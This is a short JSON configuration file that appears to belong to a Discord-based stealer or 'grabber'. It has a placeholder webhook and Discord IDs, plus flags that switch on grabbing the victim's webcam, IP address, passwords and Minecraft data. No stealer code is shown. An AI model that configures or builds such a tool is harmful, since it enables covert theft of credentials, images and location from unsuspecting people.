{
    "webhook": "WEBHOOK HERE",
    "discord_id": "ENTER YOUR DISCORD ID",
    "guild_id": "ENTER YOUR GUILD ID",
    
    "grab_webcam": true, 
    "grab_ip": true,

    "grab_password": "true",
    "grab_minecraft": "false"
}
